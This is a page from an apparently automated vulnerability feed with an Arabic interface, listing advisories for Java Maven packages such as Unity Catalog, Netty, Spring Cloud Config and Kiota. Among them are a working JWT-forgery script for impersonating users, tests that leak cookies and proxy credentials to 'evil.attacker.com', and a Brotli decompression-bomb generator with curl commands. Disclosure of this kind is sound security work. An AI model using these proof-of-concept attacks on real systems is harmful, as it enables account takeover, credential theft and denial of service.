🛡️ Vuln Watch
Vulnerabilities Package Scanner
🕐 آخر تحديث:
⏭️ التحديث القادم:
⏳ المتبقي: 00:00
الإجمالي: 242213
نتائج: 6347
ص: 1/127
📡 المصادر:
حرجة
📦 io.unitycatalog:unitycatalog-server 📌 All versions < 0.1.0, 0.2.0, 0.2.1, 0.3.0, 0.3.1 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 **Context:** A critical authentication bypass vulnerability exists in the Unity Catalog token exchange endpoint (/api/1.0/unity-control/auth/tokens). The endpoint extracts the issuer (iss) claim from incoming JWTs and uses it to dynamically fetch the JWKS endpoint for signature v...
📅 2026-05-11 OSV/Maven 🔗 التفاصيل

الوصف الكامل

**Context:** A critical authentication bypass vulnerability exists in the Unity Catalog token exchange endpoint (/api/1.0/unity-control/auth/tokens). The endpoint extracts the issuer (iss) claim from incoming JWTs and uses it to dynamically fetch the JWKS endpoint for signature validation without validating that the issuer is a trusted identity provider. **Way to exploit:** An attacker can exploit this by: 1. Hosting their own OIDC-compliant server with a valid JWKS endpoint 2. Signing a JWT with their own private key, setting the iss claim to their server 3. Setting the sub/email claim to any known user in the Unity Catalog system 4. Exchanging this crafted token for a valid internal access token This results in complete impersonation of any user in the system, granting access to all catalogs, schemas, tables, and other resources that user has permissions to. Additionally, the implementation does not validate the audience (aud) claim, allowing tokens intended for other services to be used. **Example** Example implementation doing token exchange with a self hosted `.well-known/openid-configuration` and `jwks` endpoint. This can be run with `python3 main.py` and `TARGET_USER`, `UC_SERVER` and `PORT` adjusted to the testing setup. ```python #!/usr/bin/env python3 """Unity Catalog JWT Issuer Validation Bypass PoC - Minimal Version""" import base64, secrets, threading, time from datetime import datetime, timedelta, timezone import jwt, requests from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.asymmetric import rsa from flask import Flask, jsonify TARGET_USER = "user@example.com" UC_SERVER = "http://localhost:8080" PORT = 8888 ISSUER = f"http://localhost:{PORT}" # Generate RSA key pair key = rsa.generate_private_key(public_exponent=65537, key_size=2048) kid = secrets.token_hex(8) # Create JWKS pub = key.public_key().public_numbers() def b64(n): return base64.urlsafe_b64encode(n.to_bytes((n.bit_length()+7)//8, "big")).rstrip(b"=").decode() jwks = {"keys": [{"kty": "RSA", "use": "sig", "alg": "RS256", "kid": kid, "n": b64(pub.n), "e": b64(pub.e)}]} # Create malicious JWT token = jwt.encode( {"iss": ISSUER, "sub": TARGET_USER, "email": TARGET_USER, "aud": "unity-catalog", "iat": datetime.now(timezone.utc), "exp": datetime.now(timezone.utc) + timedelta(hours=1)}, key.private_bytes(serialization.Encoding.PEM, serialization.PrivateFormat.PKCS8, serialization.NoEncryption()), algorithm="RS256", headers={"kid": kid} ) # Start minimal OIDC server app = Flask(__name__) app.logger.disabled = True @app.route("/.well-known/openid-configuration") def oidc(): return jsonify({"issuer": ISSUER, "jwks_uri": f"{ISSUER}/jwks"}) @app.route("/jwks") def keys(): return jsonify(jwks) threading.Thread(target=lambda: app.run(port=PORT, threaded=True, use_reloader=False), daemon=True).start() time.sleep(1) # Exchange token resp = requests.post(f"{UC_SERVER}/api/1.0/unity-control/auth/tokens", data={"grant_type": "urn:ietf:params:oauth:grant-type:token-exchange", "requested_token_type": "urn:ietf:params:oauth:token-type:access_token", "subject_token_type": "urn:ietf:params:oauth:token-type:id_token", "subject_token": token}) if resp.status_code == 200: access_token = resp.json()["access_token"] print(f"[+] Got access token as '{TARGET_USER}'") # Demo: list catalogs catalogs = requests.get(f"{UC_SERVER}/api/2.1/unity-catalog/catalogs", headers={"Authorization": f"Bearer {access_token}"}) print(catalogs.json()) else: print(f"[-] Failed: {resp.status_code} {resp.text}") ```

الإصدارات المتأثرة

All versions < 0.1.0, 0.2.0, 0.2.1, 0.3.0, 0.3.1

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

عالية
📦 com.ritense.valtimo:web 📌 12.10.0.RELEASE, 12.10.1.RELEASE, 12.10.2.RELEASE, 12.11.0.RELEASE, 12.12.0.RELEASE ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary The `LoggingRestClientCustomizer` in the `web` module automatically intercepts all outgoing HTTP calls made via Spring's `RestClient` and logs the full request body, response body, and response headers. When an error response is received, this information is included...
📅 2026-05-11 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Summary The `LoggingRestClientCustomizer` in the `web` module automatically intercepts all outgoing HTTP calls made via Spring's `RestClient` and logs the full request body, response body, and response headers. When an error response is received, this information is included in the thrown `HttpClientErrorException` message, which is logged at ERROR level by Spring's default exception handling — regardless of the application's DEBUG log level setting. ### Impact The logged data can contain highly sensitive information including: - Authentication credentials (JWT tokens, API keys, OAuth tokens) in request bodies or response headers - Personal data (BSN, email addresses, case details) in request/response bodies - Session tokens in `Set-Cookie` response headers This data is exposed to: - Anyone with access to application logs (stdout/log files) - Users with access to logging aggregation tools (e.g. Grafana/Loki) - Any Valtimo user with the admin role, through the built-in logging module (since Valtimo 12.5.0) Leaked authentication credentials could be used to impersonate the Valtimo application against the target external API (e.g. ZGW services), compromising that API's security boundary. Related: GHSA-hfrg-mcvw-8mch (similar sensitive data exposure in InboxHandlingService) ### Affected Code `com.ritense.valtimo.web.logging.LoggingRestClientCustomizer#intercept` in the `web` module. ### Patched Versions The vulnerability is fixed in: - **12.33.0** (v12 release line) — see PR #600 - **13.26.0** (v13 release line) — see PR #599 The fix removes the request/response report, headers, and response body from the `HttpClientErrorException` constructor; only the HTTP status code and status text remain. The full request/response report is still emitted at DEBUG level (disabled in production). ### Mitigation If you cannot upgrade to a patched version immediately, consider: - Restricting access to application logs and the Valtimo logging module - Adjusting the log level for `com.ritense.valtimo.web.logging` to WARN or higher (note: this only mitigates the DEBUG logging path; error responses still leak data via the exception message)

الإصدارات المتأثرة

12.10.0.RELEASE, 12.10.1.RELEASE, 12.10.2.RELEASE, 12.11.0.RELEASE, 12.12.0.RELEASE

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N

عالية
📦 com.oviva.telematik:epa4all-client 📌 All versions < rc.0, 0.0.4, 0.0.5, 0.0.7, 0.0.8 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 شبكة محلية ⚪ لم تُستغل 🟢 ترقيع
💬 ### Impact In SignedPublicKeysTrustValidatorImpl.isTrusted(), the ECDSA signature verification at line 45 discards the boolean return value of Signature.verify(). The method performs certificate chain validation, OCSP check, and signature algorithm setup, but never checks whether...
📅 2026-05-08 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Impact In SignedPublicKeysTrustValidatorImpl.isTrusted(), the ECDSA signature verification at line 45 discards the boolean return value of Signature.verify(). The method performs certificate chain validation, OCSP check, and signature algorithm setup, but never checks whether the signature actually matches. For any structurally valid signature, it returns true. ### Patches Patched in [#34](https://github.com/oviva-ag/epa4all-client/pull/34). ### Workarounds None. ### Resources - [MS-OVIVA-EPA4ALL-d76aec](https://www.machinespirits.com/advisory/d76aec/) ### Credits [Machine Spirits](https://machinespirits.com) (contact@machinespirits.de) - Dr. rer. nat. Simon Weber - Dipl.-Inf. Volker Schönefeld - Chiara Fliegner

الإصدارات المتأثرة

All versions < rc.0, 0.0.4, 0.0.5, 0.0.7, 0.0.8

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

عالية
📦 org.bitcoinj:bitcoinj-core 📌 All versions < 0.15, 0.15.1, 0.15.10, 0.15.2, 0.15.3 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary `ScriptExecution.correctlySpends()` contains two fast-path verification bugs for standard `P2PKH` and native `P2WPKH` spends in `core/src/main/java/org/bitcoinj/script/ScriptExecution.java`. In both branches, bitcoinj verifies an attacker-controlled signature/public-...
📅 2026-05-08 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Summary `ScriptExecution.correctlySpends()` contains two fast-path verification bugs for standard `P2PKH` and native `P2WPKH` spends in `core/src/main/java/org/bitcoinj/script/ScriptExecution.java`. In both branches, bitcoinj verifies an attacker-controlled signature/public-key pair but fails to verify that the public key is the one committed to by the output being spent. As a result, any attacker keypair can satisfy bitcoinj's local verification for arbitrary `P2PKH` and `P2WPKH` outputs. This doesn't affect the SPV (simple payment verification) trust model, as this model follows PoW and doesn't verify input signatures at all. ### Details The issue is in the optimized branches of `ScriptExecution.correctlySpends(...)`. In the `P2PKH` fast path at `core/src/main/java/org/bitcoinj/script/ScriptExecution.java:1042`, the code: - parses the attacker-supplied signature from `scriptSig` - parses the attacker-supplied public key from `scriptSig` - computes the sighash against the victim output's `scriptPubKey` - checks only `pubkey.verify(sigHash, signature)` It never enforces the missing `P2PKH` binding: - `HASH160(pubkey) == ScriptPattern.extractHashFromP2PKH(scriptPubKey)` That means the `OP_DUP OP_HASH160 <hash> OP_EQUALVERIFY OP_CHECKSIG` semantics are not actually enforced in this fast path. Relevant code: ```java } else if (ScriptPattern.isP2PKH(scriptPubKey)) { if (chunks.size() != 2) throw new ScriptException(...); TransactionSignature signature; try { byte[] data = Objects.requireNonNull(chunks.get(0).data); signature = TransactionSignature.decodeFromBitcoin(data, true, true); } catch (SignatureDecodeException x) { throw new ScriptException(...); } ECKey pubkey = ECKey.fromPublicOnly(Objects.requireNonNull(chunks.get(1).data)); Sha256Hash sigHash = txContainingThis.hashForSignature(scriptSigIndex, scriptPubKey, signature.sigHashMode(), false); boolean validSig = pubkey.verify(sigHash, signature); if (!validSig) throw new ScriptException(...); } ``` In the native `P2WPKH` fast path at `core/src/main/java/org/bitcoinj/script/ScriptExecution.java:1023`, the bug is similar. The code: - reads the attacker-supplied pubkey from `witness` - builds `scriptCode` from that attacker pubkey with `ScriptBuilder.createP2PKHOutputScript(pubkey)` - computes the BIP143 sighash using that attacker-derived `scriptCode` - verifies the signature against the attacker pubkey It never enforces: - `HASH160(pubkey) == ScriptPattern.extractHashFromP2WH(scriptPubKey)` So for `P2WPKH`, the attacker controls both the pubkey and the `scriptCode` used for signing. Relevant code: ```java if (ScriptPattern.isP2WPKH(scriptPubKey)) { Objects.requireNonNull(witness); if (witness.getPushCount() < 2) throw new ScriptException(...); TransactionSignature signature; try { signature = TransactionSignature.decodeFromBitcoin(witness.getPush(0), true, true); } catch (SignatureDecodeException x) { throw new ScriptException(...); } ECKey pubkey = ECKey.fromPublicOnly(witness.getPush(1)); Script scriptCode = ScriptBuilder.createP2PKHOutputScript(pubkey); Sha256Hash sigHash = txContainingThis.hashForWitnessSignature(scriptSigIndex, scriptCode, value, signature.sigHashMode(), false); boolean validSig = pubkey.verify(sigHash, signature); if (!validSig) throw new ScriptException(...); } ``` Affected call sites include: - `core/src/main/java/org/bitcoinj/core/TransactionInput.java:546` - `core/src/main/java/org/bitcoinj/wallet/Wallet.java:4520` - `core/src/main/java/org/bitcoinj/signers/LocalTransactionSigner.java:84` - `core/src/main/java/org/bitcoinj/signers/CustomTransactionSigner.java:77` These call sites use `correctlySpends()` for transaction/input validation and pre-signing checks. Any application that treats a successful result from this path as proof that a spend is valid is affected. ### Fix The issue is fixed on the `release-0.17` branch via 2bc5653c41d260d840692bc554690d4d79208f9c, and on `master` via b575a682acf614b9ff95cacbdeb48f86c3ababe0. A 0.17.1 maintenance release has been made available on Maven Central.

الإصدارات المتأثرة

All versions < 0.15, 0.15.1, 0.15.10, 0.15.2, 0.15.3

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

غير محدد
📦 io.netty:netty-codec-mqtt 📌 4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Impact The MQTT 5 header Properties section is parsed and buffered _before_ any message size limit is applied. Specifically, in `MqttDecoder`, the `decodeVariableHeader()` method is called before the `bytesRemainingBeforeVariableHeader > maxBytesInMessage` check. The `decode...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Impact The MQTT 5 header Properties section is parsed and buffered _before_ any message size limit is applied. Specifically, in `MqttDecoder`, the `decodeVariableHeader()` method is called before the `bytesRemainingBeforeVariableHeader > maxBytesInMessage` check. The `decodeVariableHeader()` can call other methods which will call `decodeProperties()`. Effectively, Netty does not apply any limits to the size of the properties being decoded. Additionally, because `MqttDecoder` extends `ReplayingDecoder`, Netty will repeatedly re-parse the enormous Properties sections and buffer the bytes in memory, until the entire thing parses to completion. This can cause high resource usage in both CPU and memory. ### Resources `ANT-2026-09608` https://docs.oasis-open.org/mqtt/mqtt/v5.0/os/mqtt-v5.0-os.html#_Toc3901027

الإصدارات المتأثرة

4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

4.4/10 متوسطة
📦 org.springframework.cloud:spring-cloud-config-server 📌 3.1.0, 3.1.1, 3.1.10, 3.1.2, 3.1.3 🗄️ سيرفر ☕ مكتبة Java Maven ⚡ CWE-532 🎯 محلي ⚪ لم تُستغل
💬 When enabling trace logging in Spring Cloud Config Server sensitive information was placed in plain text in the logs. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only). Spring Cloud Config 4.1.x: affe...
📅 2026-05-07 NVD 🔗 التفاصيل

الوصف الكامل

When enabling trace logging in Spring Cloud Config Server sensitive information was placed in plain text in the logs. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only). Spring Cloud Config 4.1.x: affected from 4.1.0 through 4.1.9 (inclusive); upgrade to 4.1.10 or greater (Enterprise Support Only). Spring Cloud Config 4.2.x: affected from 4.2.0 through 4.2.6 (inclusive); upgrade to 4.2.7 or greater (Enterprise Support Only). Spring Cloud Config 4.3.x: affected from 4.3.0 through 4.3.2 (inclusive); upgrade to 4.3.3 or greater. Spring Cloud Config 5.0.x: affected from 5.0.0 through 5.0.2 (inclusive); upgrade to 5.0.3 or greater.

الإصدارات المتأثرة

3.1.0, 3.1.1, 3.1.10, 3.1.2, 3.1.3

نوع الثغرة

CWE-532 — CWE-532

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

7.2/10 عالية
📦 org.springframework.cloud:spring-cloud-config-server 📌 3.1.0, 3.1.1, 3.1.10, 3.1.2, 3.1.3 🗄️ سيرفر ☕ مكتبة Java Maven ⚡ CWE-367 🎯 محلي ⚪ لم تُستغل
💬 The base directory (`spring.cloud.config.server.git.basedir`) used by the Spring Cloud Config Server to clone Git repositories to is susceptible to time-of-check-time-of-use (TOCTOU) attacks. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3....
📅 2026-05-07 NVD 🔗 التفاصيل

الوصف الكامل

The base directory (`spring.cloud.config.server.git.basedir`) used by the Spring Cloud Config Server to clone Git repositories to is susceptible to time-of-check-time-of-use (TOCTOU) attacks. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only). Spring Cloud Config 4.1.x: affected from 4.1.0 through 4.1.9 (inclusive); upgrade to 4.1.10 or greater (Enterprise Support Only). Spring Cloud Config 4.2.x: affected from 4.2.0 through 4.2.6 (inclusive); upgrade to 4.2.7 or greater (Enterprise Support Only). Spring Cloud Config 4.3.x: affected from 4.3.0 through 4.3.2 (inclusive); upgrade to 4.3.3 or greater. Spring Cloud Config 5.0.x: affected from 5.0.0 through 5.0.2 (inclusive); upgrade to 5.0.3 or greater.

الإصدارات المتأثرة

3.1.0, 3.1.1, 3.1.10, 3.1.2, 3.1.3

نوع الثغرة

CWE-367 — CWE-367

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N

9.1/10 حرجة
📦 org.springframework.cloud:spring-cloud-config-server 📌 3.1.0, 3.1.1, 3.1.10, 3.1.2, 3.1.3 🗄️ سيرفر ☕ مكتبة Java Maven ⚡ Path Traversal 🎯 عن بعد ⚪ لم تُستغل
💬 Spring Cloud Config allows applications to serve arbitrary text and binary files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack. Spring Cloud Config 3.1.x...
📅 2026-05-07 NVD 🔗 التفاصيل

الوصف الكامل

Spring Cloud Config allows applications to serve arbitrary text and binary files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only). Spring Cloud Config 4.1.x: affected from 4.1.0 through 4.1.9 (inclusive); upgrade to 4.1.10 or greater (Enterprise Support Only). Spring Cloud Config 4.2.x: affected from 4.2.0 through 4.2.6 (inclusive); upgrade to 4.2.7 or greater (Enterprise Support Only). Spring Cloud Config 4.3.x: affected from 4.3.0 through 4.3.2 (inclusive); upgrade to 4.3.3 or greater. Spring Cloud Config 5.0.x: affected from 5.0.0 through 5.0.2 (inclusive); upgrade to 5.0.3 or greater.

الإصدارات المتأثرة

3.1.0, 3.1.1, 3.1.10, 3.1.2, 3.1.3

نوع الثغرة

CWE-22 — Path Traversal

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

7.5/10 عالية
📦 org.springframework.cloud:spring-cloud-config 📌 3.1.0, 3.1.1, 3.1.10, 3.1.2, 3.1.3 🗄️ سيرفر ☕ مكتبة Java Maven ⚡ IDOR 🎯 عن بعد ⚪ لم تُستغل
💬 When using Google Secrets Manager as a backend for the Spring Cloud Config server a client can craft a request to the config server potentially exposing secrets from unintended GCP projects. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1...
📅 2026-05-07 NVD 🔗 التفاصيل

الوصف الكامل

When using Google Secrets Manager as a backend for the Spring Cloud Config server a client can craft a request to the config server potentially exposing secrets from unintended GCP projects. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only). Spring Cloud Config 4.1.x: affected from 4.1.0 through 4.1.9 (inclusive); upgrade to 4.1.10 or greater (Enterprise Support Only). Spring Cloud Config 4.2.x: affected from 4.2.0 through 4.2.6 (inclusive); upgrade to 4.2.7 or greater (Enterprise Support Only). Spring Cloud Config 4.3.x: affected from 4.3.0 through 4.3.2 (inclusive); upgrade to 4.3.3 or greater. Spring Cloud Config 5.0.x: affected from 5.0.0 through 5.0.2 (inclusive); upgrade to 5.0.3 or greater.

الإصدارات المتأثرة

3.1.0, 3.1.1, 3.1.10, 3.1.2, 3.1.3

نوع الثغرة

CWE-639 — IDOR

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

عالية
📦 com.microsoft.kiota:microsoft-kiota-abstractions 📌 All versions < 0.1.2, 0.10.0, 0.11.0, 0.11.1, 0.11.2 📟 جهاز ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary The RedirectHandler middleware in microsoft/kiota-java (com.microsoft.kiota:microsoft-kiota-http-okHttp v1.9.0) and other Kiota libraries fails to strip sensitive HTTP headers when following 3xx redirects to a different host or scheme. This vulnerability is present ...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Summary The RedirectHandler middleware in microsoft/kiota-java (com.microsoft.kiota:microsoft-kiota-http-okHttp v1.9.0) and other Kiota libraries fails to strip sensitive HTTP headers when following 3xx redirects to a different host or scheme. This vulnerability is present in the RedirectHandlers for: https://github.com/microsoft/kiota-dotnet https://github.com/microsoft/kiota-java https://github.com/microsoft/kiota-python https://github.com/microsoft/kiota-typescript https://github.com/microsoft/kiota-http-go ### Details Only the Authorization header is removed; Cookie, Proxy-Authorization, and all custom headers are forwarded to the redirect target. This is the default middleware in every kiota-java HTTP client created via KiotaClientFactory.create(). OkHttp's built-in redirect handler (which handles this correctly) is explicitly disabled at line 63 of KiotaClientFactory.java in favor of kiota's broken implementation. Vulnerable code in RedirectHandler.java lines 107-116 (getRedirect method) in versions 1.90 and earlier: ``` boolean sameScheme = locationUrl.scheme().equalsIgnoreCase(requestUrl.scheme()); boolean sameHost = locationUrl.host().toString().equalsIgnoreCase(requestUrl.host().toString()); if (!sameScheme || !sameHost) { requestBuilder.removeHeader("Authorization"); // BUG: Cookie, Proxy-Authorization, and all other headers are NOT removed } ``` ### PoC 1. Clone the repository: git clone --depth 1 https://github.com/microsoft/kiota-java.git cd kiota-java 2. Create the PoC test file at: components/http/okHttp/src/test/java/com/microsoft/kiota/http/middleware/SecurityPoC.java With this content: ``` package com.microsoft.kiota.http.middleware; import static org.junit.jupiter.api.Assertions.*; import com.microsoft.kiota.http.KiotaClientFactory; import okhttp3.*; import okhttp3.mockwebserver.*; import org.junit.jupiter.api.Test; public class SecurityPoC { @Test void crossHostRedirectLeaksCookies() throws Exception { Request original = new Request.Builder() .url("http://trusted.example.com/api") .addHeader("Authorization", "Bearer token") .addHeader("Cookie", "session=SECRET") .addHeader("Proxy-Authorization", "Basic cHJveHk6cGFzcw==") .build(); Response redirect = new Response.Builder() .request(original).protocol(Protocol.HTTP_1_1) .code(302).message("Found") .header("Location", "http://evil.attacker.com/steal") .body(ResponseBody.create("", MediaType.parse("text/plain"))) .build(); Request result = new RedirectHandler().getRedirect(original, redirect); assertNotNull(result); assertEquals("evil.attacker.com", result.url().host()); assertNull(result.header("Authorization")); // stripped (good) assertEquals("session=SECRET", result.header("Cookie")); // LEAKED assertEquals("Basic cHJveHk6cGFzcw==", result.header("Proxy-Authorization")); // LEAKED } @Test void endToEndProof() throws Exception { var evil = new MockWebServer(); evil.start(); evil.enqueue(new MockResponse().setResponseCode(200)); var trusted = new MockWebServer(); trusted.start(); trusted.enqueue(new MockResponse().setResponseCode(302) .setHeader("Location", evil.url("/steal"))); OkHttpClient client = KiotaClientFactory.create( new Interceptor[]{new RedirectHandler()}).build(); client.newCall(new Request.Builder().url(trusted.url("/api")) .addHeader("Cookie", "session=SECRET").build()).execute(); trusted.takeRequest(); RecordedRequest captured = evil.takeRequest(); assertEquals("session=SECRET", captured.getHeader("Cookie")); // LEAKED to evil server evil.shutdown(); trusted.shutdown(); } } ``` 3. Run the tests: ./gradlew :components:http:okHttp:test --tests "com.microsoft.kiota.http.middleware.SecurityPoC" 4. Result: BUILD SUCCESSFUL, 2 tests passed, 0 failures. Both tests confirm Cookie and Proxy-Authorization headers are sent to the attacker's server on cross-host redirect. ### Impact The kiota-java bug is more severe because it leaks ALL sensitive headers simultaneously (Cookie + Proxy-Authorization + custom auth headers), not just one type. Attack scenario: An attacker who can trigger a cross-origin redirect from a trusted API (via open redirect, MITM, or DNS rebinding) captures the victim's session cookies, proxy credentials, and API keys from the redirected request. Impact: - Session hijacking via leaked Cookie headers - Corporate proxy credential theft via leaked Proxy-Authorization - API key theft via leaked custom auth headers (X-API-Key, etc.) All consumers of kiota-java are affected, including Microsoft Graph SDK for Java.

الإصدارات المتأثرة

All versions < 0.1.2, 0.10.0, 0.11.0, 0.11.1, 0.11.2

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

عالية
📦 io.netty:netty-codec-http 📌 4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ## Summary `HttpContentDecompressor` accepts a `maxAllocation` parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via `ZlibDecoder`, but is silently ignored when the content encodin...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

## Summary `HttpContentDecompressor` accepts a `maxAllocation` parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via `ZlibDecoder`, but is silently ignored when the content encoding is `br` (Brotli), `zstd`, or `snappy`. An attacker can bypass the configured decompression limit by sending a compressed payload with `Content-Encoding: br` instead of `Content-Encoding: gzip`, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in `DelegatingDecompressorFrameListener` for HTTP/2 connections. ## Details `HttpContentDecompressor` stores the `maxAllocation` value at construction time (`HttpContentDecompressor.java:89`) and uses it in `newContentDecoder()` to create the appropriate decompression handler. For gzip/deflate, `maxAllocation` is forwarded to `ZlibCodecFactory.newZlibDecoder()`: ```java // HttpContentDecompressor.java:101 — maxAllocation IS enforced .handlers(ZlibCodecFactory.newZlibDecoder(ZlibWrapper.GZIP, maxAllocation)) ``` `ZlibDecoder.prepareDecompressBuffer()` enforces this as a hard cap by setting the buffer's `maxCapacity` and throwing `DecompressionException` when the limit is reached: ```java // ZlibDecoder.java:68 — hard limit on buffer capacity return ctx.alloc().heapBuffer(Math.min(preferredSize, maxAllocation), maxAllocation); // ZlibDecoder.java:80 — throws when exceeded throw new DecompressionException("Decompression buffer has reached maximum size: " + buffer.maxCapacity()); ``` For brotli, zstd, and snappy, the decoders are created without any size limit: ```java // HttpContentDecompressor.java:120 — maxAllocation IGNORED .handlers(new BrotliDecoder()) // HttpContentDecompressor.java:129 — maxAllocation IGNORED .handlers(new SnappyFrameDecoder()) // HttpContentDecompressor.java:138 — maxAllocation IGNORED .handlers(new ZstdDecoder()) ``` `BrotliDecoder` has no `maxAllocation` parameter at all — there is no way to constrain its output. It streams decompressed data in chunks via `fireChannelRead` with no total limit. `ZstdDecoder()` defaults to a 4MB `maximumAllocationSize`, but this only constrains individual buffer allocations, not total output. The decode loop (`ZstdDecoder.java:100-114`) creates new buffers and fires `channelRead` repeatedly, so total decompressed output is unbounded. The identical pattern exists in `DelegatingDecompressorFrameListener.newContentDecompressor()` at lines 188-210 for HTTP/2. ## PoC 1. Configure a Netty HTTP server with decompression bomb protection: ```java pipeline.addLast(new HttpContentDecompressor(1048576)); // 1MB max pipeline.addLast(new HttpObjectAggregator(1048576)); // 1MB max ``` 2. Generate a brotli-compressed bomb (~1KB compressed → 1GB decompressed): ```python import brotli bomb = b'\x00' * (1024 * 1024 * 1024) # 1GB of zeros compressed = brotli.compress(bomb, quality=11) with open('bomb.br', 'wb') as f: f.write(compressed) # compressed size: ~1KB ``` 3. Send the bomb with gzip encoding (BLOCKED by maxAllocation): ```bash # This is caught — ZlibDecoder enforces the 1MB limit curl -X POST http://target:8080/api \ -H 'Content-Encoding: gzip' \ --data-binary @bomb.gz # Result: DecompressionException thrown at 1MB ``` 4. Send the same bomb with brotli encoding (BYPASSES maxAllocation): ```bash # This bypasses the limit — BrotliDecoder has no maxAllocation curl -X POST http://target:8080/api \ -H 'Content-Encoding: br' \ --data-binary @bomb.br # Result: Full 1GB decompressed into memory → OOM ``` 5. The same bypass works with `Content-Encoding: zstd` and `Content-Encoding: snappy`. ## Impact - **Denial of Service**: An attacker can cause out-of-memory conditions on any Netty server that relies on `maxAllocation` for decompression bomb protection, by simply using a non-gzip content encoding. - **False sense of security**: Developers who explicitly configure `maxAllocation` to protect against decompression bombs are not actually protected for brotli, zstd, or snappy encodings. The API documentation implies all encodings are covered. - **Trivial bypass**: The attacker only needs to change one HTTP header (`Content-Encoding: br` instead of `Content-Encoding: gzip`) to circumvent the protection entirely. - **Both HTTP/1.1 and HTTP/2**: The vulnerability exists in both `HttpContentDecompressor` (HTTP/1.1) and `DelegatingDecompressorFrameListener` (HTTP/2). ## Recommended Fix Pass `maxAllocation` to all decoder constructors. For `BrotliDecoder`, which currently has no `maxAllocation` support, add the parameter: **HttpContentDecompressor.java** — pass maxAllocation to all decoders: ```java // Line 120: BrotliDecoder — add maxAllocation support .handlers(new BrotliDecoder(maxAllocation)) // Line 129: SnappyFrameDecoder — add maxAllocation support .handlers(new SnappyFrameDecoder(maxAllocation)) // Line 138: ZstdDecoder — forward the configured maxAllocation .handlers(new ZstdDecoder(maxAllocation)) ``` **DelegatingDecompressorFrameListener.java** — same fix at lines 188-210. **BrotliDecoder** — add `maxAllocation` parameter with the same semantics as `ZlibDecoder.prepareDecompressBuffer()`: set buffer maxCapacity and throw `DecompressionException` when the total decompressed output exceeds the limit. **SnappyFrameDecoder** — add `maxAllocation` parameter with equivalent enforcement. **ZstdDecoder** — ensure that when `maxAllocation` is set, total output across all buffers is bounded (not just per-buffer allocation size).

الإصدارات المتأثرة

4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

غير محدد
📦 io.netty:netty-codec-redis 📌 4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5 🗃️ قاعدة بيانات ☕ مكتبة Java Maven 🎯 محلي ⚪ لم تُستغل 🟢 ترقيع
